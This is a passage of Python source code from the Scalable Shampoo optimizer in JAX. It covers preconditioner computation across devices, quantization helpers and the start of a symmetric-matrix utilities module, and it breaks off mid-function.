as they are similarly # shaped tensors. Note statistics will be ignored as we are passing in # a large init value for error. preconditioners_init = new_stacked_padded_statistics n = new_stacked_padded_statistics.shape[0] errors_init = jnp.ones([n], jnp.float32) * inverse_failure_threshold init_state = [preconditioners_init, errors_init] perform_step = state.count % preconditioning_compute_steps == 0 new_preconditioners, errors = efficient_cond( perform_step, _internal_inverse_pth_root_all, init_state ) new_local_stats_flat = _add_error_into_local_stats( new_local_stats_flat, errors, inverse_failure_threshold ) new_local_stats = jax.tree_unflatten(treedef, new_local_stats_flat) errors = errors.reshape((-1, 1, 1)) predicate = jnp.logical_or( jnp.isnan(errors), errors >= inverse_failure_threshold ).astype(new_preconditioners.dtype) # TODO(rohananil): Check for numerical instabilities. 
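        # Where the inverse pth root failed (NaN error, or error at or above
        # inverse_failure_threshold), fall back to the previous preconditioner
        # for that statistic instead of the freshly computed one.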
new_conditional_preconditioners = ( predicate * global_stats.preconditioners + (1.0 - predicate) * new_preconditioners ) new_global_stats = GlobalShardedParameterStats( new_stacked_padded_statistics, new_conditional_preconditioners, global_stats.exponents, ) new_shampoo_state = ShampooState( count=state.count + 1, stats=ShardedShampooStats(new_global_stats, new_local_stats), ) return updates, new_shampoo_state def init_fn(params): """Initialise the optimiser's state.""" def _init(param): preconditioner = preconditioner_from_params(param) statistics = [] preconditioners = [] if not _skip_preconditioning(param): shapes = preconditioner.shapes_for_preconditioners() statistics = [ matrix_epsilon * jnp.eye(s[0], dtype=jnp.float32) for s in shapes ] preconditioners = [jnp.eye(s[0], dtype=jnp.float32) for s in shapes] diagonal_statistics = [] if _graft_type_has_diagonal_statistics(): diagonal_statistics = jnp.zeros_like(param) diagonal_momentum = _quantize_momentum(jnp.zeros_like(param)) momentum = _quantize_momentum(jnp.zeros_like(param)) return ParameterStats( _quantize_diagonal_statistics(diagonal_statistics), _maybe_quantize_statistics(statistics), _maybe_quantize_preconditioners(preconditioners), diagonal_momentum, momentum, init_training_metrics(len(statistics)), ) return ShampooState( count=jnp.zeros([], jnp.int32), stats=jax.tree_map(_init, params) ) def _skip_preconditioning(param): return len(param.shape) < skip_preconditioning_rank_lt or any( [s > skip_preconditioning_dim_size_gt for s in param.shape] ) def _compute_stats(grad, state, param, step): """Compute per-parameter statistics.""" preconditioner = preconditioner_from_params(param) new_statistics = [[]] * len(state.statistics) w1 = beta2 w2 = beta2 if beta2 == 1.0 else (1.0 - beta2) if not _skip_preconditioning(param): def compute_updated_statistics(): return preconditioner.updated_statistics_from_grad( state.statistics, grad, w1=w1, w2=w2, to_float=_to_float, from_float=lambda x: _maybe_quantize_statistics([x])[0], precision=tensordot_precision, ) if statistics_compute_steps > 1: perform_step = step % statistics_compute_steps == 0 init_state = state.statistics new_statistics = list( efficient_cond(perform_step, compute_updated_statistics, init_state) ) else: new_statistics = compute_updated_statistics() return ParameterStats( state.diagonal_statistics, new_statistics, state.preconditioners, state.diagonal_momentum, state.momentum, state.training_metrics, ) mi_pth_root = functools.partial( matrix_inverse_pth_root, ridge_epsilon=matrix_epsilon, precision=precision, relative_matrix_epsilon=relative_matrix_epsilon, lobpcg_topk_precondition=lobpcg_topk_precondition, lobpcg_max_iter=lobpcg_max_iter, ) def _matrix_inverse_pth_root_vmap(xs, ps): return jax.vmap(mi_pth_root)(xs, ps) def _quantized_matrix_inverse_pth_root_vmap(qxs, qds, qbs, ps): def _quantized_to_float(qx, qd, qb): qv = QuantizedValue(qx, qd, qb, qx.dtype, True, list(qx.shape)) return qv.to_float() def matrix_inverse_pth_root_wrapper(qx, qd, qb, p): v = _quantized_to_float(qx, qd, qb) preconditioner, error = mi_pth_root(v, p) qp = QuantizedValue.from_float_value(preconditioner, qx.dtype, True) return qp.quantized, qp.diagonal, qp.bucket_size, error return jax.vmap(matrix_inverse_pth_root_wrapper)(qxs, qds, qbs, ps) def _matrix_inverse_pth_root_pjit(xs, ps, statistics_partition_spec=None): # Partition the concatenated statistics matrix across all cores. 
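        # Pattern: constrain the stacked statistics to the preconditioner
        # partitioning, run the vmapped inverse pth root shard-wise, then
        # constrain the result back to statistics_partition_spec so downstream
        # code sees the original layout.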
pspec_for_partition = preconditioner_partition_spec partitioned_xs = pjit.with_sharding_constraint(xs, pspec_for_partition) if preconditioner_partition_spec: partitioned_ps_spec = pjit.PartitionSpec(preconditioner_partition_spec[0]) else: partitioned_ps_spec = None partitioned_ps = pjit.with_sharding_constraint(ps, partitioned_ps_spec) # Run matrix inverse pth root on each shard. partitioned_preconditioners, partitioned_errors = _matrix_inverse_pth_root_vmap( partitioned_xs, partitioned_ps ) # Reshard output to have the same PSpec as input. This is required to avoid # vmap seeing the full set of statistics. partitioned_preconditioners = pjit.with_sharding_constraint( partitioned_preconditioners, pspec_for_partition ) # Recombine the outputs at each core. preconditioners = pjit.with_sharding_constraint( partitioned_preconditioners, statistics_partition_spec ) errors = pjit.with_sharding_constraint(partitioned_errors, pjit.PartitionSpec()) return preconditioners, errors def _pmap_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ): """Computes preconditioners for given statistics in states in PMAP mode. Args: states: A list of optimizer states. step: Current step number statistics: A list of statistics for all variables (for every dim) num_statistics_per_state: Number of statistis per state to reconstruct output states. original_shapes: A list of shapes of the statistics. exponents: Exponent power to use for inverse-pth roots. max_size: Maximum dim of the statistics to pad. prev_preconditioners: Previously available preconditioner. Returns: New optimizer states after computing the preconditioner. """ if batch_axis_name: num_devices = lax.psum(1, batch_axis_name) else: num_devices = 1 num_statistics = len(statistics) # Pad statistics and exponents to next multiple of num_devices. packed_statistics = [pad_square_matrix(stat, max_size) for stat in statistics] to_pad = -num_statistics % num_devices packed_statistics.extend( [jnp.eye(max_size, dtype=packed_statistics[0].dtype) for _ in range(to_pad)] ) exponents.extend([1 for _ in range(to_pad)]) if not packed_statistics: return states all_statistics = batch(packed_statistics, num_devices) all_exponents = batch(exponents, num_devices) def _internal_inverse_pth_root_all(): if batch_axis_name: current_replica = lax.axis_index(batch_axis_name) preconditioners, errors = _matrix_inverse_pth_root_vmap( all_statistics[current_replica], all_exponents[current_replica] ) preconditioners = jax.lax.all_gather(preconditioners, batch_axis_name) errors = jax.lax.all_gather(errors, batch_axis_name) preconditioners_flat = unbatch(preconditioners) errors_flat = unbatch(errors) else: preconditioners, errors = _matrix_inverse_pth_root_vmap( all_statistics[0], all_exponents[0] ) preconditioners_flat = unbatch(jnp.stack([preconditioners])) errors_flat = unbatch(jnp.stack([errors])) return preconditioners_flat, errors_flat if preconditioning_compute_steps == 1: preconditioners_flat, errors_flat = _internal_inverse_pth_root_all() else: # Passing statistics instead of preconditioners as they are similarly # shaped tensors. Note statistics will be ignored as we are passing in # a large init value for error. 
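            # efficient_cond only runs _internal_inverse_pth_root_all when
            # perform_step is True (its while_loop body executes at most once);
            # otherwise it returns init_state unchanged, so the large error
            # values below mark these entries as "not recomputed this step".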
preconditioners_init = packed_statistics errors_init = [inverse_failure_threshold] * len(packed_statistics) init_state = [preconditioners_init, errors_init] perform_step = step % preconditioning_compute_steps == 0 preconditioners_flat, errors_flat = efficient_cond( perform_step, _internal_inverse_pth_root_all, init_state ) def _skip(error): condition = jnp.logical_or( jnp.isnan(error), error >= inverse_failure_threshold ) return condition.astype(error.dtype) def _select_preconditioner(error, new_p, old_p): return lax.cond( _skip(error), lambda _: old_p, lambda _: new_p, operand=None ) new_preconditioners_flat = [] new_errors_flat = [] for p, shape, prev_p, error in zip( preconditioners_flat, original_shapes, prev_preconditioners, errors_flat ): new_preconditioners_flat.append( _select_preconditioner(error, p[: shape[0], : shape[1]], prev_p) ) new_errors_flat.append(error) assert len(states) == len(num_statistics_per_state) assert len(new_preconditioners_flat) == num_statistics assert len(new_errors_flat) == num_statistics # Add back empty preconditioners so we that we can set the optimizer state. preconditioners_for_states = [] idx = 0 errors_for_states = [] for num_statistics, state in zip(num_statistics_per_state, states): if num_statistics == 0: preconditioners_for_states.append([]) errors_for_states.append(jnp.array(0, jnp.float32)) else: preconditioners_for_state = new_preconditioners_flat[ idx : idx + num_statistics ] assert len(state.statistics) == len(preconditioners_for_state) preconditioners_for_states.append(preconditioners_for_state) errors_for_state = jnp.stack( new_errors_flat[idx : idx + num_statistics] ) assert len(state.statistics) == len(errors_for_state) errors_for_states.append(errors_for_state) idx += num_statistics new_states = [] for state, new_preconditioners, new_errors in zip( states, preconditioners_for_states, errors_for_states ): if state.statistics: new_errors = jnp.where( jnp.logical_and( new_errors > 0.0, new_errors != inverse_failure_threshold ), new_errors, state.training_metrics.inverse_pth_root_errors, ) new_training_metrics = TrainingMetrics(new_errors) new_states.append( ParameterStats( state.diagonal_statistics, state.statistics, new_preconditioners, state.diagonal_momentum, state.momentum, new_training_metrics, ) ) return new_states def _pmap_quantized_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ): """Computes preconditioners for given statistics in states in PMAP mode. For quantization, each statistic is represented by three values: quantized matrix, diagonal, and bucket sizes, we run inverse pth-roots without ever recreating the original matrix in f32. Args: states: A list of optimizer states. step: Current step number statistics: A list of statistics for all variables (for every dim) num_statistics_per_state: Number of statistis per state to reconstruct output states. original_shapes: A list of shapes of the statistics. exponents: Exponent power to use for inverse-pth roots. max_size: Maximum dim of the statistics to pad. prev_preconditioners: Previously available preconditioner. Returns: New optimizer states after computing the preconditioner. """ num_devices = lax.psum(1, batch_axis_name) num_statistics = len(statistics) quantized_dtype = quantized_dtype_for_second_moment_statistics_buffers() # Complexity here is around: shapes needing be statically shaped, # our custom quantization type requires a different type of packing. 
# Parallel tensors: # quantized [dxd] # diagonals [d] f32 # bucket_sizes [d] f32 packed_quantized_statistics = [ pad_square_matrix(stat.quantized, max_size) for stat in statistics ] packed_quantized_diagonals = [ pad_vector(stat.diagonal, max_size) for stat in statistics ] packed_quantized_bucket_sizes = [ pad_vector(stat.bucket_size, max_size) for stat in statistics ] to_pad = -num_statistics % num_devices padded_eye = jnp.eye(max_size, dtype=jnp.float32) quantized_eye = QuantizedValue.from_float_value( padded_eye, quantized_dtype, True ) packed_quantized_statistics.extend( [quantized_eye.quantized for _ in range(to_pad)] ) packed_quantized_diagonals.extend( [quantized_eye.diagonal for _ in range(to_pad)] ) packed_quantized_bucket_sizes.extend( [quantized_eye.bucket_size for _ in range(to_pad)] ) exponents.extend([1 for _ in range(to_pad)]) if not packed_quantized_statistics: return states all_quantized_statistics = batch(packed_quantized_statistics, num_devices) all_quantized_diagonals = batch(packed_quantized_diagonals, num_devices) all_quantized_bucket_sizes = batch(packed_quantized_bucket_sizes, num_devices) all_exponents = batch(exponents, num_devices) def _internal_inverse_pth_root_all(): current_replica = lax.axis_index(batch_axis_name) ( quantized_preconditioners, quantized_diagonals, quantized_bucket_sizes, errors, ) = _quantized_matrix_inverse_pth_root_vmap( all_quantized_statistics[current_replica], all_quantized_diagonals[current_replica], all_quantized_bucket_sizes[current_replica], all_exponents[current_replica], ) quantized_preconditioners = jax.lax.all_gather( quantized_preconditioners, batch_axis_name ) quantized_diagonals = jax.lax.all_gather( quantized_diagonals, batch_axis_name ) quantized_bucket_sizes = jax.lax.all_gather( quantized_bucket_sizes, batch_axis_name ) errors = jax.lax.all_gather(errors, batch_axis_name) quantized_preconditioners_flat = unbatch(quantized_preconditioners) quantized_diagonals_flat = unbatch(quantized_diagonals) quantized_bucket_sizes_flat = unbatch(quantized_bucket_sizes) errors_flat = unbatch(errors) return ( quantized_preconditioners_flat, quantized_diagonals_flat, quantized_bucket_sizes_flat, errors_flat, ) if preconditioning_compute_steps == 1: ( quantized_preconditioners_flat, quantized_diagonals_flat, quantized_bucket_sizes_flat, errors_flat, ) = _internal_inverse_pth_root_all() else: # Passing statistics instead of preconditioners as they are similarly # shaped tensors. Note statistics will be ignored as we are passing in # a large init value for error. 
quantized_preconditioners_init = packed_quantized_statistics quantized_diagonals_init = packed_quantized_diagonals quantized_bucket_sizes_init = packed_quantized_bucket_sizes errors_init = [inverse_failure_threshold] * len( quantized_preconditioners_init ) init_state = [ quantized_preconditioners_init, quantized_diagonals_init, quantized_bucket_sizes_init, errors_init, ] perform_step = step % preconditioning_compute_steps == 0 ( quantized_preconditioners_flat, quantized_diagonals_flat, quantized_bucket_sizes_flat, errors_flat, ) = efficient_cond(perform_step, _internal_inverse_pth_root_all, init_state) def _skip(error): condition = jnp.logical_or( jnp.isnan(error), error >= inverse_failure_threshold ) return condition.astype(error.dtype) def _select_preconditioner(error, new_p, old_p): return lax.cond( _skip(error), lambda _: old_p, lambda _: new_p, operand=None ) new_quantized_preconditioners_flat = [] new_quantized_diagonals_flat = [] new_quantized_bucket_sizes_flat = [] new_errors_flat = [] for p, d, b, shape, prev_p, error in zip( quantized_preconditioners_flat, quantized_diagonals_flat, quantized_bucket_sizes_flat, original_shapes, prev_preconditioners, errors_flat, ): new_quantized_preconditioners_flat.append( _select_preconditioner( error, p[: shape[0], : shape[1]], prev_p.quantized ) ) new_quantized_diagonals_flat.append( _select_preconditioner(error, d[: shape[0]], prev_p.diagonal) ) new_quantized_bucket_sizes_flat.append( _select_preconditioner(error, b[: shape[0]], prev_p.bucket_size) ) new_errors_flat.append(error) assert len(states) == len(num_statistics_per_state) assert len(new_quantized_preconditioners_flat) == num_statistics assert len(new_quantized_diagonals_flat) == num_statistics assert len(new_quantized_bucket_sizes_flat) == num_statistics # Add back empty preconditioners so we that we can set the optimizer state. 
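        # Parameters that skipped preconditioning contributed zero statistics,
        # so they get an empty preconditioner list and a scalar zero error to
        # keep the per-parameter output aligned with `states`.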
preconditioners_for_states = [] errors_for_states = [] idx = 0 for num_statistics, state in zip(num_statistics_per_state, states): if num_statistics == 0: preconditioners_for_states.append([]) errors_for_states.append(jnp.array(0, jnp.float32)) else: quantized_preconditioners_for_state = ( new_quantized_preconditioners_flat[idx : idx + num_statistics] ) quantized_diagonals_for_state = new_quantized_diagonals_flat[ idx : idx + num_statistics ] quantized_bucket_sizes_for_state = new_quantized_bucket_sizes_flat[ idx : idx + num_statistics ] errors_for_state = jnp.stack( new_errors_flat[idx : idx + num_statistics] ) assert len(state.statistics) == len(quantized_preconditioners_for_state) assert len(state.statistics) == len(quantized_diagonals_for_state) assert len(state.statistics) == len(quantized_bucket_sizes_for_state) assert len(state.statistics) == len(errors_for_state) quantized_preconditioners = [] for qv, qd, qb in zip( quantized_preconditioners_for_state, quantized_diagonals_for_state, quantized_bucket_sizes_for_state, ): quantized_preconditioners.append( QuantizedValue(qv, qd, qb, qv.dtype, True, list(qv.shape)) ) preconditioners_for_states.append(quantized_preconditioners) errors_for_states.append(errors_for_state) idx += num_statistics new_states = [] for state, new_preconditioners, new_errors in zip( states, preconditioners_for_states, errors_for_states ): if state.statistics: new_errors = jnp.where( jnp.logical_and( new_errors > 0.0, new_errors != inverse_failure_threshold ), new_errors, state.training_metrics.inverse_pth_root_errors, ) new_training_metrics = TrainingMetrics(new_errors) new_states.append( ParameterStats( state.diagonal_statistics, state.statistics, new_preconditioners, state.diagonal_momentum, state.momentum, new_training_metrics, ) ) return new_states def _pjit_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ): """Computes preconditioners for given statistics in states in PJIT mode. Args: states: A list of optimizer states. step: Current step number statistics: A list of statistics for all variables (for every dim) num_statistics_per_state: Number of statistis per state to reconstruct output states. original_shapes: A list of shapes of the statistics. exponents: Exponent power to use for inverse-pth roots. max_size: Maximum dim of the statistics to pad. prev_preconditioners: Previously available preconditioner. Returns: New optimizer states after computing the preconditioner. """ num_statistics = len(statistics) to_pad = -num_statistics % num_devices_for_pjit padded_statistics = [pad_square_matrix(stat, max_size) for stat in statistics] padded_statistics.extend( [jnp.eye(max_size, dtype=padded_statistics[0].dtype) for _ in range(to_pad)] ) exponents.extend([1 for _ in range(to_pad)]) all_statistics = jnp.stack(padded_statistics) all_exponents = jnp.stack(exponents) def _internal_inverse_pth_root_all(): preconditioners, errors = _matrix_inverse_pth_root_pjit( all_statistics, all_exponents ) b1 = preconditioners.shape[0] def split(batched_values): return [ jnp.squeeze(v) for v in jnp.split(batched_values, indices_or_sections=b1, axis=0) ] return split(preconditioners), split(errors) if preconditioning_compute_steps == 1: preconditioners_flat, errors_flat = _internal_inverse_pth_root_all() else: # Passing statistics instead of preconditioners as they are similarly # shaped tensors. Note statistics will be ignored as we are passing in # a large init value for error. 
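# (added note) Same device-count padding and skip-step trick as the pmap path
# above: the padded statistics plus an `inverse_failure_threshold` error act
# as placeholder outputs whenever `efficient_cond` bypasses the pth-root solve.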
preconditioners_init = padded_statistics errors_init = [inverse_failure_threshold] * len(padded_statistics) init_state = [preconditioners_init, errors_init] perform_step = step % preconditioning_compute_steps == 0 preconditioners_flat, errors_flat = efficient_cond( perform_step, _internal_inverse_pth_root_all, init_state ) def _skip(error): condition = jnp.logical_or( jnp.isnan(error), error >= inverse_failure_threshold ) return condition.astype(error.dtype) def _select_preconditioner(error, new_p, old_p): return lax.cond( _skip(error), lambda _: old_p, lambda _: new_p, operand=None ) new_preconditioners_flat = [] new_errors_flat = [] for p, shape, prev_p, error in zip( preconditioners_flat, original_shapes, prev_preconditioners, errors_flat ): new_preconditioners_flat.append( _select_preconditioner(error, p[: shape[0], : shape[1]], prev_p) ) new_errors_flat.append(error) assert len(states) == len(num_statistics_per_state) assert len(new_preconditioners_flat) == num_statistics # Add back empty preconditioners so we that we can set the optimizer state. preconditioners_for_states = [] errors_for_states = [] idx = 0 for num_statistics, state in zip(num_statistics_per_state, states): if num_statistics == 0: preconditioners_for_states.append([]) errors_for_states.append(jnp.array(0, jnp.float32)) else: preconditioners_for_state = new_preconditioners_flat[ idx : idx + num_statistics ] assert len(state.statistics) == len(preconditioners_for_state) preconditioners_for_states.append(preconditioners_for_state) errors_for_state = jnp.stack( new_errors_flat[idx : idx + num_statistics] ) assert len(state.statistics) == len(errors_for_state) errors_for_states.append(errors_for_state) idx += num_statistics new_states = [] for state, new_preconditioners, new_errors in zip( states, preconditioners_for_states, errors_for_states ): if state.statistics: new_errors = jnp.where( jnp.logical_and( new_errors > 0.0, new_errors != inverse_failure_threshold ), new_errors, state.training_metrics.inverse_pth_root_errors, ) new_training_metrics = TrainingMetrics(new_errors) new_states.append( ParameterStats( state.diagonal_statistics, state.statistics, new_preconditioners, state.diagonal_momentum, state.momentum, new_training_metrics, ) ) return new_states def _compute_preconditioners(states, params, step): """Computes preconditioners for given statistics in states. Args: states: A list of optimizer states. params: A list of params. step: Current step number Returns: New optimizer states after computing the preconditioner. """ statistics = [] num_statistics_per_state = [] original_shapes = [] exponents = [] max_size = 0 prev_preconditioners = [] for state, param in zip(states, params): num_statistics = len(state.statistics) num_statistics_per_state.append(num_statistics) original_shapes_for_state = [] if num_statistics > 0: preconditioner = preconditioner_from_params(param) for statistic in state.statistics: exponents.append( preconditioner.exponent_for_preconditioner() if exponent_override == 0 else exponent_override ) original_shapes_for_state.append(statistic.shape) max_size = max(max_size, statistic.shape[0]) statistics.extend(state.statistics) prev_preconditioners.extend(state.preconditioners) original_shapes.extend(original_shapes_for_state) if not shard_optimizer_states: # Quantization is only enabled if batch_axis_name is not set. 
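# (added note) Dispatch summary: float32 second-moment buffers mean
# quantization is effectively disabled, so the plain pmap path is taken; any
# lower-precision dtype goes through the quantized pmap path; sharded
# optimizer states always use the pjit path in the else-branch below.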
quantized_dtype = quantized_dtype_for_second_moment_statistics_buffers() if quantized_dtype == jnp.float32: return _pmap_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ) else: return _pmap_quantized_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ) else: return _pjit_compute_preconditioners( states, step, statistics, num_statistics_per_state, original_shapes, exponents, max_size, prev_preconditioners, ) def _transform_grad(grad, state, param, step): """Transform per-parameter gradients.""" preconditioner = preconditioner_from_params(param) sgd_update = grad new_diagonal_statistics = state.diagonal_statistics.to_float() if ( graft_type == GraftingType.ADAGRAD or graft_type == GraftingType.ADAGRAD_NORMALIZED ): scaled_grad = grad if graft_type == GraftingType.ADAGRAD_NORMALIZED: scaled_grad = grad / (jnp.linalg.norm(grad) + 1e-16) new_diagonal_statistics = state.diagonal_statistics.to_float() + jnp.square( scaled_grad ) adagrad_update = scaled_grad / ( jnp.sqrt(new_diagonal_statistics) + diagonal_epsilon ) grafting_update = adagrad_update elif ( graft_type == GraftingType.RMSPROP or graft_type == GraftingType.RMSPROP_NORMALIZED ): scaled_grad = grad if graft_type == GraftingType.RMSPROP_NORMALIZED: scaled_grad = grad / (jnp.linalg.norm(grad) + 1e-16) w1 = beta2 w2 = beta2 if beta2 == 1.0 else (1.0 - beta2) new_diagonal_statistics = ( w1 * state.diagonal_statistics.to_float() + w2 * jnp.square(scaled_grad) ) rmsprop_update = scaled_grad / ( jnp.sqrt(new_diagonal_statistics) + diagonal_epsilon ) if clip_by_scaled_gradient_norm: scaled_grad_norm = jnp.linalg.norm(rmsprop_update) / ( jnp.sqrt(float(rmsprop_update.size)) ) clipping_denom = jnp.maximum( 1.0, scaled_grad_norm / clip_by_scaled_gradient_norm ) rmsprop_update /= clipping_denom grafting_update = rmsprop_update elif graft_type == GraftingType.SGD: grafting_update = sgd_update else: grafting_update = jnp.ones_like(sgd_update) * jnp.sign(sgd_update) lr = learning_rate if callable(learning_rate): lr = learning_rate(step) preconditioner_multiplier = lr if not decoupled_learning_rate else 1.0 grafting_update = grafting_update * preconditioner_multiplier precond_grad = grad if not _skip_preconditioning(param): precond_grad = preconditioner.preconditioned_grad( precond_grad, _maybe_dequantize_preconditioners(state.preconditioners) ) else: precond_grad = grafting_update grafting_update_norm = jnp.linalg.norm(grafting_update) precond_grad_norm = jnp.linalg.norm(precond_grad) multiplier = grafting_update_norm / (precond_grad_norm + 1e-16) shampoo_update = precond_grad * multiplier shampoo_update_with_wd = shampoo_update grafting_update_with_wd = grafting_update if weight_decay != 0 and not decoupled_weight_decay: shampoo_update_with_wd = shampoo_update + weight_decay * param grafting_update_with_wd = grafting_update + weight_decay * param w = (1.0 - beta1) if moving_average_for_momentum else 1.0 shampoo_update_with_wd_momentum = ( state.momentum.to_float() * beta1 + w * shampoo_update_with_wd ) grafting_update_with_wd_momentum = ( state.diagonal_momentum.to_float() * beta1 + w * grafting_update_with_wd ) run_shampoo = (step >= start_preconditioning_step).astype( grafting_update_with_wd_momentum.dtype ) momentum_update = ( run_shampoo * shampoo_update_with_wd_momentum + (1.0 - run_shampoo) * grafting_update_with_wd_momentum ) wd_update = ( run_shampoo * 
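# (added note) run_shampoo is a 0./1. gate: before start_preconditioning_step
# only the grafting update is applied, afterwards the preconditioned update.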
shampoo_update_with_wd + (1.0 - run_shampoo) * grafting_update_with_wd ) nesterov_momentum_update = momentum_update if nesterov: nesterov_momentum_update = w * wd_update + beta1 * momentum_update if weight_decay != 0 and decoupled_weight_decay: nesterov_momentum_update = ( nesterov_momentum_update + lr * weight_decay * param ) momentum_multiplier = lr if decoupled_learning_rate else 1.0 transformed_update = -1.0 * momentum_multiplier * nesterov_momentum_update new_diagonal_momentum = grafting_update_with_wd_momentum new_momentum = shampoo_update_with_wd_momentum param_stats = ParameterStats( _quantize_diagonal_statistics(new_diagonal_statistics), state.statistics, state.preconditioners, _quantize_momentum(new_diagonal_momentum), _quantize_momentum(new_momentum), state.training_metrics, ) return transformed_update, param_stats def update_fn(grads, state, params): """Transform the input gradient and update all statistics. Args: grads: the gradient tensors for the parameters and any custom gradients for preconditioners. state: a named tuple containing the state of the optimizer params: the parameters that should be updated. Returns: A tuple containing the new parameters and the new optimizer state. """ params_flat, treedef = jax.tree_flatten(params) stats_flat = treedef.flatten_up_to(state.stats) grads_flat = treedef.flatten_up_to(grads) stats_grads = grads_flat new_stats_flat = jax.tree_map( lambda g, s, p: _compute_stats(g, s, p, state.count), stats_grads, stats_flat, params_flat, ) new_stats_flat = _compute_preconditioners( new_stats_flat, params_flat, state.count ) outputs = jax.tree_map( lambda g, s, p: _transform_grad(g, s, p, state.count), grads_flat, new_stats_flat, params_flat, ) updates_flat, new_stats_flat = list(zip(*outputs)) if outputs else ((), ()) updates = jax.tree_unflatten(treedef, updates_flat) new_stats = jax.tree_unflatten(treedef, new_stats_flat) new_state = ShampooState(count=state.count + 1, stats=new_stats) return updates, new_state if shard_optimizer_states: # Hijacks the init_fn signature so we can return an OptState with # appropriate init_fns. opt_init_fn = sharded_init_fn def _init_fns(unused_params): return InitFnState( init_fn=opt_init_fn, pspec_fn=sharded_init_partition_spec_fn, shape_and_dtype_fn=sharded_init_shape_and_dtype_fn, ) opt_update_fn = sharded_update_fn return optax.GradientTransformation(_init_fns, opt_update_fn) else: return optax.GradientTransformation(init_fn, update_fn) File: tools/train/scalable_shampoo/quantization_utils.py # coding=utf-8 # Copyright 2022 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
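# (added) Rough usage sketch for the QuantizedValue helper defined below; this
# is an illustration, not part of the original module:
#
#   import jax.numpy as jnp
#   m = jnp.eye(4) * 3.0
#   qv = QuantizedValue.from_float_value(m, jnp.int8, extract_diagonal=True)
#   # qv.quantized holds int8 codes, qv.diagonal the extracted diagonal, and
#   # qv.bucket_size the per-column scale (max_abs / 127 for int8);
#   # qv.to_float() reconstructs an approximation of m.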
"""Helper routines for quantization.""" from typing import Any import chex import jax.numpy as jnp from flax import struct # pylint:disable=no-value-for-parameter @struct.dataclass class QuantizedValue: """State associated with quantized value.""" quantized: chex.Array diagonal: chex.Array # Diagonal (if extract_diagonal is set) bucket_size: chex.Array quantized_dtype: jnp.dtype = struct.field( pytree_node=False ) # Dtype for the quantized value. extract_diagonal: bool = struct.field(pytree_node=False) # In case its centered. shape: Any = struct.field(pytree_node=False) # Shape of the tensor. @classmethod def from_float_value(cls, fvalue, quantized_dtype, extract_diagonal=False): if isinstance(fvalue, list) and not fvalue: return QuantizedValue([], [], [], quantized_dtype, extract_diagonal, []) quantized, diagonal_fvalue, bucket_size = QuantizedValue.quantize( fvalue, quantized_dtype, extract_diagonal ) return QuantizedValue( quantized, diagonal_fvalue, bucket_size, quantized_dtype, extract_diagonal, list(quantized.shape), ) # Quantization is from Lingvo JAX optimizers. # We extend it for int16 quantization of PSD matrices. @classmethod def quantize(cls, fvalue, quantized_dtype, extract_diagonal=False): """Returns quantized value and the bucket.""" if quantized_dtype == jnp.float32: return fvalue, [], [] elif quantized_dtype == jnp.bfloat16: return fvalue.astype(jnp.bfloat16), [], [] float_dtype = fvalue.dtype if quantized_dtype == jnp.int8: # value -128 is not used. num_buckets = jnp.array(127.0, dtype=float_dtype) elif quantized_dtype == jnp.int16: # value -32768 is not used. num_buckets = jnp.array(32767.0, dtype=float_dtype) else: raise ValueError(f"Quantized dtype {quantized_dtype} not supported.") # max value is mapped to num_buckets if extract_diagonal and fvalue.ndim != 2: raise ValueError( f"Input array {fvalue} must be 2D to work with extract_diagonal." ) diagonal_fvalue = [] if extract_diagonal: diagonal_fvalue = jnp.diag(fvalue) # Remove the diagonal entries. fvalue = fvalue - jnp.diag(diagonal_fvalue) # TODO(rohananil): Extend this by making use of information about the blocks # SM3 style which will be useful for diagonal statistics # We first decide the scale. if fvalue.ndim < 1: raise ValueError( f"Input array {fvalue} must have a strictly positive number of dimensions." ) max_abs = jnp.max(jnp.abs(fvalue), axis=0) bucket_size = max_abs / num_buckets bs_expanded = bucket_size[jnp.newaxis, Ellipsis] # To avoid divide by 0.0 bs_nonzero = jnp.where( bs_expanded > 0.0, bs_expanded, jnp.ones_like(bs_expanded) ) ratio = fvalue / bs_nonzero # We use rounding to remove bias. quantized = jnp.round(ratio) return quantized.astype(quantized_dtype), diagonal_fvalue, bucket_size def to_float(self): """Returns the float value.""" if isinstance(self.quantized, list) and not self.quantized: return self.quantized if self.quantized_dtype == jnp.float32: return self.quantized if self.quantized_dtype == jnp.bfloat16: return self.quantized.astype(jnp.float32) float_dtype = self.bucket_size.dtype bucket_size = self.bucket_size[jnp.newaxis, Ellipsis] val = self.quantized.astype(float_dtype) * bucket_size if self.extract_diagonal: val += jnp.diag(self.diagonal) return val File: tools/train/scalable_shampoo/symmetric_matrices/symmetric_matrices.py # coding=utf-8 # Copyright 2022 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """JAX Ops for symmetric matrices used by the Shampoo optimizer.""" import functools from typing import Any, List, Optional, Sequence, Union import jax import jax.numpy as jnp import numpy as np from flax import struct from jax import lax @struct.dataclass class SlicedSymmetricMatrix: """A symmetric matrix represented by lower-triangular block row slices. For example, the symmetric matrix M = [[a, b^T], [b, c]] would be represented by the block rows a and [b, c]. The matrix may be batched, in which case each entry of block_rows may have dimension greater than 2. The last two dimensions represent the rows and cols. """ block_rows: List[jnp.ndarray] def product_with_transpose( mat1, mat2, axes, precision=lax.Precision.DEFAULT, ): """Returns mat1 * mat2^T for two matrices (possibly batched). The rows and columns are the last two dimensions for each matrix. Args: mat1: First matrix. mat2: Second matrix. axes: The axes over which to apply the product. precision: JAX precision to use for the multiplication. """ return jnp.tensordot(a=mat1, b=mat2, axes=axes, 